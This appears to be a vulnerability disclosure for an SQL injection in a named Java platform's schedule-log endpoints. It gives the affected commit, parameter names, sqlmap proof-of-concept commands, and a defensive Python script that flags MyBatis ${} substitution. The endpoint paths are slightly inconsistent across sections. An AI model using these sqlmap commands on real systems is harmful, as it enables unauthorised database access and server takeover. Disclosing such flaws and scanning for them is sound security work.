### Key Information Summary

#### Vulnerability Overview

- **Vulnerability Type**: SQL Injection Vulnerability
- **Affected Version**: Latest version, specifically commit (2025-06-29): cafaccf
- **Description**: In the latest version, two parameters passed to `sanitized` are not using prepared statements, leading to an SQL injection vulnerability. Attackers can exploit this vulnerability to take control of the server.

#### Vulnerability Details

- **Tested Version**: commit (2025-06-29): cafaccf
- **Vulnerable Endpoints and Parameters**:
  - `http://127.0.0.1:8090/sys/schedule/log?beanName=1`
  - `http://127.0.0.1:8090/sys/schedule/LogList?methodName=1`
- **Taint Analysis**:
  - Related Code File: `com/platform/controller/ScheduleJobLogController.java`
  - Methods: `queryPage` and `queryPagePlus`
  - XML Mapping File: `ScheduleJobLogDao.xml`

#### POC - sqlmap

- **Command Examples**:

```bash
python sqlmap.py -r request1.txt -p beanName --technique=T --time-sec=5 --tamper='charencode,between'
python sqlmap.py -r request2.txt -p methodName --tamper=charencode,between --level 5 --flush-session
```

- **Request Examples**:
  - `request1.txt`: Contains HTTP request for `/sys/schedule/log/list?beanName=1`
  - `request2.txt`: Contains HTTP request for `/sys/schedule/log/list?methodName=1`

#### Impact

- **Link**: [Impact of a Successful SQL Injection Attack](https://portswigger.net/web-security/sql-injection/what-is-the-impact-of-a-successful-sql-injection-attack)
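
A review check for the root cause named under Taint Analysis, added here as an example and not taken from the project: it scans a MyBatis mapper for `${...}` string substitution, which bypasses prepared statements, where `#{...}` would bind the value. It assumes the unprepared `beanName` and `methodName` parameters come from `${}` usage in the mapper XML, which the summary does not show; the sample mapper, its statement ids, table and columns are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mapper: statement ids, table and column names are
# hypothetical; only the parameter names come from the advisory.
SAMPLE_MAPPER = """
<mapper namespace="example.JobLogDao">
  <select id="listByBean" resultType="map">
    SELECT * FROM job_log
    <where>
      <if test="beanName != null">AND bean_name LIKE '%${beanName}%'</if>
    </where>
  </select>
  <select id="listByMethod" resultType="map">
    SELECT * FROM job_log
    <where>
      <if test="methodName != null">
        AND method_name LIKE CONCAT('%', #{methodName}, '%')
      </if>
    </where>
  </select>
</mapper>
"""

STATEMENT_TAGS = {"select", "insert", "update", "delete", "sql"}
# ${x} is pasted into the SQL text; #{x} is sent as a bound parameter.
RAW_SUBSTITUTION = re.compile(r"\$\{\s*([^}]+?)\s*\}")

def find_raw_substitutions(mapper_xml):
    """Return sorted (statement id, expression) pairs that use ${...}."""
    findings = set()
    for stmt in ET.fromstring(mapper_xml).iter():
        if stmt.tag not in STATEMENT_TAGS:
            continue
        # itertext() also covers nested dynamic tags such as <where> and <if>.
        sql_text = "".join(stmt.itertext())
        for expr in RAW_SUBSTITUTION.findall(sql_text):
            findings.add((stmt.get("id", "<no id>"), expr))
    return sorted(findings)

if __name__ == "__main__":
    for stmt_id, expr in find_raw_substitutions(SAMPLE_MAPPER):
        print(f"{stmt_id}: ${{{expr}}} is string-substituted, bind it with #{{{expr}}}")
```

Where a value cannot be bound, such as a column name in `ORDER BY`, a finding from this check should be resolved with a server-side allowlist rather than by keeping `${}` on request input.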